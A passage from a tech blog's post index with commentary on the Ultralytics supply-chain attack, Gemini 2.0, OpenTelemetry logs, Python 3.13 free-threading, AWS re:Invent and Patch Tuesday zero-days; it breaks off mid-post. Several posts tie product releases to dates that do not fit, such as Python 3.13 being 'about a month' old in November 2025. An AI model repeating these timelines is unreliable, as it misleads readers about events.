depends on Ultralytics was potentially exposed.\nI\u0026rsquo;ve been advocating for better supply chain security practices for years, and incidents like this validate the concern. But advocacy without practical solutions is just noise. Understanding xz Utils aftermath and how the industry learned from that attack is crucial for building better defenses. 
So let\u0026rsquo;s talk about what actually works.\nPractical Defenses # Lock your dependencies. Use pip-compile with --generate-hashes to produce exact version pins with hashes; pip freeze on its own gives you exact versions but no hashes. If you\u0026rsquo;re using Poetry, the lockfile includes hashes by default. Hash verification (pip\u0026rsquo;s --require-hashes mode) ensures that if the artifact behind a pinned version ever differs from the one you locked, your install will fail rather than silently accepting the change.\nUse a private registry or proxy. Tools like Artifactory, Nexus, or even a simple devpi instance can cache and scan packages before they reach your development environments. This adds a layer of inspection between the public registry and your infrastructure.\nAudit your CI/CD permissions. The Ultralytics attack specifically targeted the publish pipeline. Review your GitHub Actions workflows: do they use permissions: to restrict token scopes? Are you using OpenID Connect (OIDC) for publishing instead of long-lived API tokens? PyPI now supports trusted publishers via OIDC, which eliminates the need for stored secrets entirely.\nMonitor for anomalies. If your CI/CD suddenly starts consuming significantly more CPU or network bandwidth, investigate. Cryptominers are noisy because they\u0026rsquo;re designed to maximize resource usage. Set up alerts on unusual resource consumption patterns.\nConsider Sigstore and package signing. The Python ecosystem is moving toward cryptographic signing of packages, and PyPI has been rolling out support for attestations. This is still early, but it\u0026rsquo;s the right direction. A signed package from a verified publisher provides a much stronger trust signal than an unsigned upload.\nThe Systemic Challenge # The deeper issue is that the open-source ecosystem\u0026rsquo;s distribution infrastructure wasn\u0026rsquo;t designed for an adversarial environment. PyPI, npm, and similar registries were built in an era when the primary concern was convenience, not security. 
Retrofitting security onto these systems is difficult but essential.\nInitiatives like OpenSSF and the Supply chain Levels for Software Artifacts (SLSA) framework are working on this problem at a structural level. SLSA provides a maturity model for supply chain security, from basic source integrity through to hermetic, reproducible builds. Getting the Python ecosystem to SLSA Level 3 or 4 would make attacks like this significantly harder, though we\u0026rsquo;re a long way from that being universal.\nMy Take # Every time one of these attacks hits, the conversation follows the same pattern: alarm, followed by recommendations, followed by a slow return to the status quo. I\u0026rsquo;d love to say this time will be different, but I\u0026rsquo;ve been in this industry long enough to know better.\nWhat I can say is that the tools for defending against supply chain attacks are better than they\u0026rsquo;ve ever been. Hash pinning, OIDC publishing, package attestations, and private registries are all available today. The barrier isn\u0026rsquo;t technology — it\u0026rsquo;s adoption.\nIf this incident prompts your team to add hash verification to your requirements files and audit your CI/CD permissions, then something good came from it. Security is ultimately about making the attacker\u0026rsquo;s job harder, one improvement at a time. 
Don\u0026rsquo;t let this week\u0026rsquo;s lesson go to waste.\n","date":"18 December 2025","externalUrl":null,"permalink":"/posts/251218-ultralytics-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A supply chain attack on the popular Ultralytics YOLO package highlights the persistent vulnerability of the Python ecosystem’s distribution pipeline.","title":"Ultralytics Supply Chain Attack — When Your Dependencies Bite Back","type":"posts"},{"content":"Google just dropped Gemini 2.0, and after spending the better part of today reading through the technical details, I think this deserves more than the usual \u0026ldquo;new model drops\u0026rdquo; fanfare. This isn\u0026rsquo;t just an incremental bump — it\u0026rsquo;s a fundamental shift in how Google is positioning its AI platform for developers.\nWhat Makes 2.0 Different # The headline feature is what Google calls \u0026ldquo;native multimodal output.\u0026rdquo; While previous Gemini versions could understand images, audio, and video as inputs, Gemini 2.0 can now generate across modalities natively. We\u0026rsquo;re talking about a model that can produce images and audio alongside text, not through bolted-on pipelines but as a core capability.\nThe initial release centers on Gemini 2.0 Flash, which Google describes as their workhorse model — optimized for speed and cost while maintaining strong performance. They\u0026rsquo;re making it available through the Gemini API and Google AI Studio, which means developers can start experimenting immediately.\nWhat caught my eye is the emphasis on \u0026ldquo;agentic\u0026rdquo; capabilities. Google is clearly betting that the next wave of AI applications won\u0026rsquo;t just be chatbots — they\u0026rsquo;ll be autonomous agents that can reason, plan, and take actions. 
Gemini 2.0 introduces native tool use, meaning the model can invoke Google Search, execute code, and call third-party functions as part of its reasoning chain without the awkward prompt engineering gymnastics we\u0026rsquo;ve been doing.\nThe Developer Experience Angle # From a practical standpoint, the improvements to the API are what matter most to those of us building applications. The new multimodal live API supports real-time streaming of audio and video inputs, which opens up entirely new categories of applications. Think real-time visual analysis, interactive tutoring systems, or accessibility tools that can describe and interact with the physical world.\nI\u0026rsquo;ve been building integrations with various LLM APIs for the past two years, and the pattern has always been the same: take text in, get text out, bolt on vision or audio through separate endpoints. Having these capabilities unified at the model level should simplify architectures considerably. No more orchestrating between a vision model, a language model, and a text-to-speech service — one API call handles the lot.\nThe context window remains generous at 1 million tokens for Flash, which is important for the kinds of document analysis and code review tasks I frequently use these models for. Processing an entire codebase in a single context is no longer a theoretical capability — it\u0026rsquo;s a practical one.\nProject Astra and the Agent Future # Google also showed off updates to Project Astra, their research prototype for a universal AI assistant. The demo showed Astra maintaining context across conversations, remembering where you left your belongings, and understanding spatial relationships in real-time video.\nThis is where things get interesting — and also where I start getting cautious. The demo is impressive, but demos always are. The gap between a controlled research prototype and a reliable production system is vast. 
I\u0026rsquo;ve seen too many \u0026ldquo;the future is here\u0026rdquo; presentations that quietly get shelved six months later.\nThat said, the underlying technology is sound. The combination of real-time multimodal understanding with persistent memory and tool use is the right architecture for genuinely useful AI agents. Whether Google can execute on that vision at scale is a different question.\nThe Competitive Landscape # This announcement doesn\u0026rsquo;t happen in isolation. OpenAI has been pushing hard with GPT-4 and its successors like GPT-5, Anthropic continues to iterate on Claude with new capabilities, and Meta\u0026rsquo;s Llama models keep democratizing access to powerful open-weight models. The AI infrastructure space is evolving at a pace I\u0026rsquo;ve never seen in thirty years of tech.\nWhat differentiates Google\u0026rsquo;s position is their integration depth. Gemini 2.0 isn\u0026rsquo;t just a model — it\u0026rsquo;s embedded in Search, Android, Chrome, and the broader Google Cloud ecosystem. For enterprises already invested in Google Cloud Platform, the path to adoption is significantly shorter than bolting on a third-party AI service.\nFor those of us working with multiple cloud providers, though, this tight integration is a double-edged sword. Vendor lock-in is a real concern, and I\u0026rsquo;d advise any team to maintain abstraction layers over their AI provider choices. The landscape is moving too fast to bet everything on one horse — the lessons from infrastructure consolidation efforts we\u0026rsquo;ve seen with container platforms apply equally to AI infrastructure.\nMy Take # Gemini 2.0 is genuinely impressive, and the focus on developer experience is welcome. The multimodal native approach is the right direction — it\u0026rsquo;s how these models should have worked from the start, and it\u0026rsquo;s going to simplify a lot of production architectures.\nBut I want to see it in the wild. 
Benchmarks and demos tell one story; production reliability, latency under load, and real-world accuracy tell another. I\u0026rsquo;ll be integrating Gemini 2.0 Flash into a couple of side projects this week to get hands-on experience.\nWhat I\u0026rsquo;m most excited about is the agentic capability. If the tool use is as reliable as Google claims, it could dramatically reduce the scaffolding code we write around LLM applications. Less orchestration code means fewer bugs, simpler deployments, and faster iteration cycles. That\u0026rsquo;s the kind of progress that actually matters in the trenches.\nThe AI development space continues to move at a breathtaking pace. Every few months, capabilities that seemed theoretical become practical. As someone who started their career when \u0026ldquo;artificial intelligence\u0026rdquo; meant expert systems with hand-coded rules, I find the current trajectory both exhilarating and humbling. We\u0026rsquo;re building tools that will reshape how software is developed, and Gemini 2.0 is another significant step on that path.\n","date":"11 December 2025","externalUrl":null,"permalink":"/posts/251211-google-gemini-2-multimodal-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google launches Gemini 2.0 with native multimodal capabilities, and the implications for developers are significant.","title":"Google Gemini 2.0 — A New Chapter in Multimodal AI","type":"posts"},{"content":"It\u0026rsquo;s been a long road, but OpenTelemetry has finally reached general availability for all three pillars of observability: traces, metrics, and now logs. The logging specification and SDK implementations hitting stable status this fall completes a journey that started back in 2019 when OpenTracing and OpenCensus merged. 
For those of us who\u0026rsquo;ve been dealing with observability tooling for years, this is a quiet but significant milestone.\nWhy This Completion Matters # If you\u0026rsquo;re wondering why a logging specification reaching GA is newsworthy, you probably haven\u0026rsquo;t felt the pain of running observability at scale across multiple services, languages, and backend vendors. This connects to broader infrastructure maturity, platform engineering, and cloud cost optimization challenges that teams face. Let me paint the picture.\nIn a typical microservices environment, you might have traces going to Jaeger, metrics going to Prometheus, and logs going to Elasticsearch via Fluentd. Three different collection agents, three different data formats, three different correlation mechanisms. When an incident occurs and you need to jump from a trace span to the relevant logs, you\u0026rsquo;re manually copying trace IDs and searching across systems. It works, but it\u0026rsquo;s slow and error-prone when you\u0026rsquo;re debugging at 3 AM.\nOpenTelemetry\u0026rsquo;s promise has always been a unified, vendor-neutral standard for all telemetry data. With logs now GA, you can instrument your application once and have traces, metrics, and logs all using the same context propagation, the same attribute conventions, and the same export pipeline. A log line automatically carries the trace ID and span ID of the operation that produced it. Correlation becomes automatic rather than manual.\nThe OpenTelemetry Logging Model # The logging approach OpenTelemetry took is pragmatic and worth understanding. Rather than creating yet another logging framework to compete with Log4j, logback, Python\u0026rsquo;s logging module, or Winston, OpenTelemetry provides a Log Bridge API. This bridges existing logging frameworks into the OpenTelemetry ecosystem.\nIn practice, this means you keep using whatever logging library you already use. 
You add an OpenTelemetry log appender/handler, and your existing log statements automatically get enriched with trace context, resource attributes, and semantic conventions. The logs then flow through the same OpenTelemetry Collector pipeline as your traces and metrics.\nThis was the right design choice. Asking developers to replace their logging framework would have been a non-starter. By bridging instead of replacing, OpenTelemetry can be adopted incrementally — exactly how good infrastructure tools should work. Similar pragmatic approaches are seen in infrastructure-as-code evolution, where standardization improves operational efficiency across diverse teams and environments.\nHere\u0026rsquo;s what it looks like in a Java application:\n// Your existing logging code — no changes needed logger.info(\u0026#34;Processing order {}\u0026#34;, orderId); // The OpenTelemetry log appender automatically adds: // - trace_id from the current span context // - span_id from the current span // - resource attributes (service.name, deployment.environment, etc.) // - semantic conventions for structured attributes And in Python:\nimport logging from opentelemetry._logs import set_logger_provider from opentelemetry.sdk._logs import LoggerProvider from opentelemetry.sdk._logs.export import BatchLogRecordProcessor # Set up the OTel log provider once at startup provider = LoggerProvider() set_logger_provider(provider) # Your existing logging continues to work exactly as before logging.info(\u0026#34;Processing order %s\u0026#34;, order_id) The Collector as Universal Pipeline # With all three signal types now stable, the OpenTelemetry Collector becomes an incredibly powerful piece of infrastructure. A single Collector deployment can receive traces, metrics, and logs from your applications, process them (filtering, sampling, enriching, transforming), and export them to any supported backend.\nThe processor pipeline is where this gets really interesting. 
You can:\nSample traces based on error status or latency thresholds, and automatically keep the associated logs Derive metrics from trace spans (request duration histograms, error rates) without additional instrumentation Enrich logs with Kubernetes metadata by connecting to the K8s API Filter sensitive data from all telemetry types in a single processor Route different signal types to different backends while maintaining correlation I\u0026rsquo;ve been running a Collector setup that sends traces to Jaeger, metrics to Prometheus, and logs to Loki — all through a single pipeline. The operational simplification compared to running separate collection agents for each signal type is substantial. One deployment to manage, one configuration format, one set of health checks. This mirrors how unified platform engineering consolidates infrastructure concerns.\nMigration Strategy # If you\u0026rsquo;re currently running a traditional observability stack (ELK for logs, Prometheus for metrics, Jaeger for traces), here\u0026rsquo;s the migration path I\u0026rsquo;d recommend:\nPhase 1 — Traces first: If you haven\u0026rsquo;t already, instrument your services with OpenTelemetry tracing. The trace SDKs have been GA for over a year and are production-ready. This gives you the foundation for context propagation.\nPhase 2 — Metrics alongside Prometheus: OpenTelemetry metrics can export in Prometheus format, so you can run both in parallel. Gradually migrate custom metrics to OpenTelemetry instrumentation while keeping your Prometheus infrastructure.\nPhase 3 — Logs bridge: Add the OpenTelemetry log bridge to your existing logging framework. Route logs through the Collector. 
You\u0026rsquo;ll immediately get trace-correlated logs without changing any application code.\nPhase 4 — Consolidate backends: Once all three signals flow through the Collector, you can evaluate whether to consolidate on a single backend (like Grafana\u0026rsquo;s LGTM stack) or keep specialized backends with the Collector handling routing.\nMy Take # I\u0026rsquo;ve lived through the observability evolution from Nagios check scripts to the current ecosystem, and OpenTelemetry is the most important infrastructure standard to emerge in the last decade. Not because it\u0026rsquo;s technically revolutionary — many of the ideas existed in proprietary form — but because it provides a vendor-neutral foundation that prevents lock-in.\nThe logging GA specifically matters because logs are still how most developers debug. Traces are powerful but conceptually harder. Metrics are great for dashboards but don\u0026rsquo;t tell you why something broke. Logs with trace context give you the \u0026ldquo;why\u0026rdquo; linked directly to the \u0026ldquo;where\u0026rdquo; and \u0026ldquo;when.\u0026rdquo;\nIf your organization hasn\u0026rsquo;t started adopting OpenTelemetry, now is the time. The standard is stable, the ecosystem is mature, and the major observability vendors — Datadog, New Relic, Dynatrace, Grafana Labs — all support it. You\u0026rsquo;re no longer an early adopter; you\u0026rsquo;re following a well-trodden path.\nThe three pillars are complete. The excuses for not having correlated observability are running out.\n","date":"4 December 2025","externalUrl":null,"permalink":"/posts/251204-opentelemetry-logs-ga-three-pillars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTelemetry’s logging API and SDK reaching general availability completes the observability trifecta. 
Here’s why this matters more than you might think.","title":"OpenTelemetry Reaches GA for Logs — The Three Pillars Are Finally Complete","type":"posts"},{"content":"Python 3.13 has been out for about a month now, and the feature everyone\u0026rsquo;s talking about is the experimental free-threaded build — Python without the Global Interpreter Lock (GIL). After decades of the GIL being the standard answer to \u0026ldquo;why is my Python program only using one core?\u0026rdquo;, we\u0026rsquo;re finally seeing what a GIL-free Python looks like in practice. I\u0026rsquo;ve spent the last few weeks testing it with real workloads, and the results are\u0026hellip; nuanced.\nUnderstanding the Free-Threading Build # First, some context for those who haven\u0026rsquo;t been following the PEP 703 journey. The free-threaded build is an experimental option — you have to specifically install the python3.13t variant or build CPython with --disable-gil. It\u0026rsquo;s not the default, and for good reason: removing the GIL required fundamental changes to CPython\u0026rsquo;s memory management, reference counting, and object lifecycle.\nThe GIL has been both Python\u0026rsquo;s curse and its hidden blessing. Yes, it prevents true parallelism in CPU-bound multi-threaded code. But it also makes CPython\u0026rsquo;s internals simpler and C extensions safer. Remove it, and you need to replace it with fine-grained locking, atomic operations, and thread-safe memory management — all of which have performance implications. This architectural challenge parallels problems systems languages have solved differently.\nThe Python development team, led by Sam Gross\u0026rsquo;s original no-GIL work, has done an impressive job minimizing the single-threaded performance penalty. In my benchmarks, the free-threaded build runs single-threaded code about 5-10% slower than the standard build. That\u0026rsquo;s much better than early estimates suggested, but it\u0026rsquo;s not zero. 
This mirrors the Python 3.14 free-threading roadmap and shows how languages like Go and Rust have solved concurrency problems in different ways.\nWhere Free-Threading Shines # For CPU-bound parallel workloads, the results are genuinely exciting. I tested a data processing pipeline that transforms and validates large CSV files — the kind of ETL work that\u0026rsquo;s typically done with multiprocessing in Python. With free-threading and the concurrent.futures.ThreadPoolExecutor, I saw near-linear scaling up to 8 cores. Concurrent executor improvements continue this momentum, as does Python\u0026rsquo;s broader tooling consolidation.\n1 thread: 45 seconds (vs. 42 seconds with GIL build) 4 threads: 12.3 seconds 8 threads: 6.8 seconds Compare this to the standard GIL build where adding threads to CPU-bound work actually makes it slower due to GIL contention. And compared to multiprocessing, free-threading avoids the overhead of serializing data between processes — which can be substantial for large datasets.\nImage processing is another natural fit. Using Pillow for batch image resizing and format conversion, free-threading provided a 6.5x speedup on 8 cores compared to single-threaded execution. With multiprocessing, the same workload only achieved 4.2x due to the overhead of passing image data between processes.\nWhere It Doesn\u0026rsquo;t (Yet) # The ecosystem compatibility situation is the main obstacle. Many popular C extensions aren\u0026rsquo;t yet thread-safe without the GIL. NumPy has made significant progress — their 2.1 release includes initial free-threading support — but it\u0026rsquo;s still marked as experimental. Pandas, scikit-learn, and many other scientific Python staples don\u0026rsquo;t officially support free-threading yet.\nI hit real issues with SQLAlchemy. While the library itself is working on free-threading compatibility, some of the underlying database drivers aren\u0026rsquo;t there yet. 
Connection pooling with free-threading requires careful configuration, and I encountered sporadic segfaults with certain connection patterns. If your application is database-heavy, stick with the standard build for now.\nWeb frameworks are a mixed bag. Flask and Django both run on the free-threaded build, but their middleware ecosystems haven\u0026rsquo;t been fully audited. I wouldn\u0026rsquo;t run a production web service on the free-threaded build today — the risk of subtle thread-safety bugs in third-party middleware is too high.\nThe Practical Path Forward # For most Python developers in November 2025, the actionable advice is:\nDo try it for: CPU-bound batch processing scripts, data pipelines that don\u0026rsquo;t depend on incompatible C extensions, and new projects where you control the full dependency stack. These are workloads where you can validate thread safety and where the performance gains are substantial.\nDon\u0026rsquo;t use it for: Production web services, applications with complex C extension dependencies, or anything where a subtle threading bug could cause data corruption. The ecosystem needs another 6-12 months to catch up.\nPrepare for it: Even if you\u0026rsquo;re not using free-threading today, start auditing your code for thread safety. Shared mutable state, global variables modified in request handlers, lazy initialization patterns — these will all become actual bugs when the GIL goes away. This is similar to how robust testing practices help catch subtle logic errors before production. The threading module documentation has been updated with guidance on writing GIL-free-compatible code.\nThe Bigger Picture # What excites me most about this isn\u0026rsquo;t the immediate performance gains — it\u0026rsquo;s what it means for Python\u0026rsquo;s long-term competitiveness. 
The GIL has been the standard argument for \u0026ldquo;Python is too slow for production.\u0026rdquo; With free-threading, Python can genuinely utilize modern multi-core hardware for CPU-bound work without the awkwardness of multiprocessing.\nCombined with the performance improvements we\u0026rsquo;ve seen in Python 3.11 and 3.12 — the adaptive interpreter, specialization at the bytecode level — Python is getting meaningfully faster with each release. It\u0026rsquo;ll never match C++ or Rust in raw performance, nor should it try. But narrowing the gap enough that you don\u0026rsquo;t need to rewrite your hot paths in another language? That\u0026rsquo;s a game-changer for developer productivity.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.3 days, and the GIL has always been that awkward thing you explain to new developers — \u0026ldquo;yes, threads exist, but they don\u0026rsquo;t really work for CPU-bound tasks, use multiprocessing instead, but watch out for the serialization overhead.\u0026rdquo; It\u0026rsquo;s been Python\u0026rsquo;s most enduring footgun.\nThe free-threaded build in 3.13 is a first step, not a final destination. It\u0026rsquo;s experimental for a reason. But the direction is right, the implementation is solid, and the performance characteristics are promising. Give it another year for the ecosystem to adapt, and I think we\u0026rsquo;ll look back at Python 3.13 as the release that finally set Python free from its biggest architectural limitation.\nFor now, I\u0026rsquo;m keeping it in my toolkit for specific workloads and watching the ecosystem closely. If you maintain a C extension or a popular library, please start testing with the free-threaded build. 
The sooner the ecosystem catches up, the sooner we all benefit.\n","date":"27 November 2025","externalUrl":null,"permalink":"/posts/251127-python-313-free-threading-gil/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.13’s experimental free-threading mode is here. I’ve been testing it in production workloads — here’s what actually works and what doesn’t.","title":"Python 3.13 in Production — Free-Threading and the GIL's Slow Goodbye","type":"posts"},{"content":"AWS re:Invent 2025 kicks off in Las Vegas in about ten days, and as someone who\u0026rsquo;s attended (physically or virtually) since the early days, I\u0026rsquo;ve developed a pretty good filter for separating the signal from the noise. Every year, AWS announces hundreds of services and features. Most are incremental improvements. A handful genuinely change how we build systems. Here\u0026rsquo;s what I\u0026rsquo;m watching for this year and why it matters.\nThe AI Infrastructure Play # If there\u0026rsquo;s one thing we can predict with certainty, it\u0026rsquo;s that AI and machine learning will dominate the keynotes. AWS has been aggressively expanding its AI infrastructure — from custom Trainium and Inferentia chips to Bedrock\u0026rsquo;s growing model marketplace. The question isn\u0026rsquo;t whether there will be AI announcements; it\u0026rsquo;s whether they\u0026rsquo;ll be genuinely useful or just keeping-up-with-Azure announcements.\nWhat I\u0026rsquo;m specifically watching for is improvements to Amazon Bedrock. The model-agnostic approach is smart — letting customers choose between Anthropic\u0026rsquo;s Claude, Meta\u0026rsquo;s Llama, and other models without rewriting their integration code. This flexibility mirrors the broader AI infrastructure consolidation happening in the industry. But the developer experience still has rough edges. 
Model versioning is confusing, the pricing model is opaque compared to calling APIs directly, and the fine-tuning workflows feel bolted-on rather than integrated.\nIf AWS announces a more streamlined fine-tuning pipeline with better cost visibility and perhaps native RAG (Retrieval-Augmented Generation) support that doesn\u0026rsquo;t require stitching together five different services, that would be genuinely valuable. The current pattern of \u0026ldquo;connect S3 to Kendra to Bedrock to Lambda to API Gateway\u0026rdquo; for a simple RAG application is exactly the kind of AWS complexity that drives teams to simpler alternatives.\nServerless Evolution # Lambda has been the poster child for serverless computing for years, but it\u0026rsquo;s showing its age in some areas. Cold start times, while improved, are still a pain point for latency-sensitive applications. The 15-minute execution limit constrains certain workloads. And the programming model — while simple — doesn\u0026rsquo;t adapt well to complex, stateful workflows.\nI\u0026rsquo;m expecting announcements around AWS Step Functions and workflow orchestration. This connects to the emergence of agent-based systems that coordinate complex multi-step workflows. The pattern of using Step Functions to coordinate Lambda invocations works but is verbose and hard to debug. If AWS introduces something like a simplified workflow DSL or better visual debugging tools, that would address a real pain point.\nI\u0026rsquo;m also curious whether we\u0026rsquo;ll see any movement on serverless containers. AWS Fargate has been around for years, but the gap between \u0026ldquo;truly serverless\u0026rdquo; Lambda and \u0026ldquo;managed containers\u0026rdquo; Fargate is still wide. 
Something that offers container flexibility with Lambda-like scaling and pricing — pay per request, scale to zero — would be compelling.\nThe Database Landscape # AWS already has an absurd number of database offerings — Aurora, DynamoDB, Neptune, Timestream, QLDB, MemoryDB, DocumentDB, Keyspaces, and more. Every year I half-expect them to announce \u0026ldquo;Amazon DatabaseForYourSpecificUseCase.\u0026rdquo; But beyond the jokes, there are genuine innovations happening here.\nWhat I\u0026rsquo;d like to see is better cross-database querying. In any non-trivial application, data lives in multiple stores — relational data in Aurora, session data in ElastiCache, search in OpenSearch, analytics in Redshift. Querying across these boundaries is painful. The Aurora zero-ETL integration with Redshift was a step in the right direction, but we need this pattern to expand.\nDynamoDB improvements are always worth watching too. It\u0026rsquo;s become the default choice for serverless backends, but operations like data modeling, migration, and cost optimization remain challenging. Better tooling around capacity planning and cost prediction would help teams avoid the bill shock that comes from getting DynamoDB access patterns wrong.\nNetworking and Multi-Region # This is the unglamorous category that quietly determines whether your architecture actually works at scale. AWS networking has improved enormously over the years, but multi-region deployments are still harder than they should be. These infrastructure challenges parallel what I\u0026rsquo;ve seen with Kubernetes deployment complexity. 
AWS Cloud WAN simplified some of the network topology management, but the complexity of running a truly global application — with data residency requirements, latency-based routing, and regional failover — remains daunting.\nI\u0026rsquo;d love to see improvements to cross-region replication for more services, simplified multi-region API Gateway setups, and perhaps better tooling for testing failover scenarios. The gap between \u0026ldquo;we\u0026rsquo;re multi-region\u0026rdquo; on the architecture diagram and \u0026ldquo;we\u0026rsquo;ve actually tested regional failover\u0026rdquo; is enormous in most organizations.\nWhat I\u0026rsquo;m Skeptical About # Every re:Invent brings announcements that sound impressive on stage but turn out to be limited preview features available in us-east-1 only, with pricing that makes them impractical for most workloads. I\u0026rsquo;m skeptical of any announcement that:\nRequires \u0026ldquo;contact sales for pricing\u0026rdquo; — it\u0026rsquo;s going to be expensive Is available in \u0026ldquo;preview\u0026rdquo; in one region — you won\u0026rsquo;t use it in production for a year Involves a new proprietary query language or SDK — the ecosystem won\u0026rsquo;t be there Claims to \u0026ldquo;simplify\u0026rdquo; something by adding another service to the stack My Take # The most impactful AWS announcements are rarely the flashiest. Lambda was a relatively quiet launch that changed how we build applications. The same goes for CDK, which didn\u0026rsquo;t get a keynote moment but fundamentally improved infrastructure-as-code on AWS. I\u0026rsquo;ll be watching for the quiet announcements that solve real problems, not the keynote demos that solve theoretical ones.\nIf you\u0026rsquo;re attending re:Invent, my advice is the same as every year: skip the keynotes (watch them on YouTube later), go to the chalk talks and builder sessions, and spend time in the hallway track talking to other practitioners. 
That\u0026rsquo;s where the real value is.\nI\u0026rsquo;ll do a proper deep-dive on the actual announcements next month. For now, let\u0026rsquo;s see what AWS has in store.\n","date":"20 November 2025","externalUrl":null,"permalink":"/posts/251120-aws-reinvent-2025-preview/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With re:Invent just around the corner, here’s what matters most for teams building on AWS — and what’s likely just marketing noise.","title":"AWS re:Invent 2025 Preview — What I'm Watching For","type":"posts"},{"content":"","date":"13 November 2025","externalUrl":null,"permalink":"/series/breaches--zero-days/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Breaches \u0026 Zero-Days","type":"series"},{"content":"This week\u0026rsquo;s Patch Tuesday from Microsoft was a stark reminder that while we\u0026rsquo;re all talking about AI-powered security tools and zero-trust architectures, the fundamentals haven\u0026rsquo;t changed: unpatched vulnerabilities remain the primary attack vector for most breaches. November\u0026rsquo;s patch batch included multiple zero-day vulnerabilities under active exploitation, and the details should make every ops team sit up and pay attention.\nThe November Zero-Days # Microsoft patched over 90 vulnerabilities this month, including several that were already being exploited in the wild. The ones that concern me most are the privilege escalation vulnerabilities in the Windows kernel — CVE-2025-43629 and related issues that allow attackers who\u0026rsquo;ve gained initial access to elevate to SYSTEM privileges.\nWhat makes these particularly dangerous is the attack chain they enable. An attacker gets initial access through a phishing email or a compromised web application — low-privilege access that might go unnoticed. 
Then they use these kernel vulnerabilities to escalate privileges, install persistent backdoors, and move laterally through the network. By the time your SIEM alerts fire, the damage is done.\nThe NTLM-related vulnerability is another one worth flagging. Despite years of deprecation warnings, NTLM authentication is still deeply embedded in enterprise environments. This particular flaw allows relay attacks that can compromise Active Directory environments — and if you think your organization has fully migrated away from NTLM, I\u0026rsquo;d encourage you to actually check. You might be surprised.\nThe Patch Management Paradox # Here\u0026rsquo;s what frustrates me after three decades in this industry: we know exactly how to prevent the majority of security incidents. Patch promptly, enforce least privilege, use multi-factor authentication, and segment your networks. These aren\u0026rsquo;t novel ideas. They\u0026rsquo;re not even particularly difficult to implement technically.\nYet organizations consistently struggle with patch management. I\u0026rsquo;ve consulted with companies running critical infrastructure on Windows servers that are months behind on patches because \u0026ldquo;we can\u0026rsquo;t afford the downtime\u0026rdquo; or \u0026ldquo;we need to test for compatibility first.\u0026rdquo; Both are legitimate concerns, but neither is an acceptable excuse when you\u0026rsquo;re running known-vulnerable software exposed to the internet.\nThe paradox is that the same organizations investing millions in AI-powered threat detection and extended detection and response (XDR) platforms are simultaneously running unpatched Exchange servers. It\u0026rsquo;s like installing a state-of-the-art alarm system while leaving the front door unlocked. 
The same issue that enabled earlier major breaches like Salt Typhoon\u0026rsquo;s telecom infiltration often starts with unpatched systems that attackers exploit for initial access.\nWhat Good Patch Management Actually Looks Like # After helping numerous organizations improve their security posture, I\u0026rsquo;ve found that effective patch management comes down to a few key principles:\nAutomated testing pipelines: If you can\u0026rsquo;t patch quickly because you\u0026rsquo;re afraid of breaking things, the solution isn\u0026rsquo;t slower patching — it\u0026rsquo;s better testing. Organizations that have invested in automated regression testing can deploy patches within days rather than weeks. The investment in CI/CD for your infrastructure pays dividends in security.\nTiered deployment: Not everything needs to be patched simultaneously. Critical zero-days on internet-facing systems? Same day. Internal application servers? Within a week. Legacy systems with compensating controls? Within the standard maintenance window. Having a clear tier system removes the analysis paralysis.\nCompensating controls: When you genuinely can\u0026rsquo;t patch immediately — and there are legitimate cases — have compensating controls ready to deploy. Network segmentation, enhanced monitoring, temporary access restrictions. These buy you time without leaving systems fully exposed.\nVisibility: You can\u0026rsquo;t patch what you don\u0026rsquo;t know about. Asset inventory sounds boring, but it\u0026rsquo;s the foundation of everything. I\u0026rsquo;ve seen organizations discover entire server farms they\u0026rsquo;d forgotten about during incident response. That\u0026rsquo;s a failure of basic hygiene, not a failure of security technology.\nThe Linux Side Isn\u0026rsquo;t Immune # While Microsoft\u0026rsquo;s Patch Tuesday gets the headlines, the Linux ecosystem had its own critical issues this month. 
Several privilege escalation vulnerabilities in the kernel, along with issues in commonly deployed packages, required attention. The advantage of most Linux environments is that package management and automated updates are more mature — but the disadvantage is that many Linux servers are treated as \u0026ldquo;set and forget\u0026rdquo; appliances that nobody monitors.\nContainer environments add another layer of complexity. Your base images might be built on a distribution version with known vulnerabilities, and unless you\u0026rsquo;re regularly rebuilding and redeploying containers, those vulnerabilities persist indefinitely. Tools like Trivy and Grype help, but only if someone\u0026rsquo;s actually looking at the output. This is where Kubernetes security hardening and observability practices become essential safeguards.\nMy Take # I know this isn\u0026rsquo;t a glamorous topic. Nobody gets promoted for maintaining a well-patched infrastructure — they get promoted for deploying the shiny new platform. But after thirty years of watching security incidents unfold, I can tell you that the vast majority could have been prevented with timely patching and basic security hygiene.\nMy challenge to every engineering leader reading this: when was the last time you audited your patch compliance? Not your policy — your actual compliance. Check your vulnerability scanner results. Look at the mean time between patch release and deployment. If that number is measured in months, you have a problem that no amount of AI-powered security tooling will solve. This is why supply chain security frameworks like SLSA matter — they ensure you have visibility into what you\u0026rsquo;re actually running.\nThe zero-day treadmill never stops. 
The only question is whether you\u0026rsquo;re running fast enough to stay on it.\n","date":"13 November 2025","externalUrl":null,"permalink":"/posts/251113-zero-day-treadmill-patch-tuesday/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"November’s Patch Tuesday brought critical zero-days being actively exploited, reminding us that patch management is still the unglamorous foundation of security.","title":"The Zero-Day Treadmill — Why Patch Tuesday Still Matters in 2025","type":"posts"},{"content":"Last week\u0026rsquo;s GitHub Universe 2025 was one of those events that makes you sit back and recalibrate your mental model of software development. After thirty years of writing code, I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be incremental. But what GitHub unveiled this time feels genuinely different — not because of any single feature, but because of the clear trajectory it reveals.\nCopilot as a Teammate, Not a Tab-Completer # The biggest announcement was the evolution of GitHub Copilot from an autocomplete tool into something closer to an autonomous development agent. GitHub Copilot Workspace has been in preview for a while, but the general availability announcement and the new multi-file editing capabilities show that GitHub is serious about moving Copilot from \u0026ldquo;fancy autocomplete\u0026rdquo; to \u0026ldquo;junior developer who never sleeps.\u0026rdquo;\nThe new agent mode can now take a GitHub issue, analyze the codebase, propose a plan, implement changes across multiple files, and even run tests. I\u0026rsquo;ve been testing the preview, and while it\u0026rsquo;s not going to replace your senior engineers any time soon, it 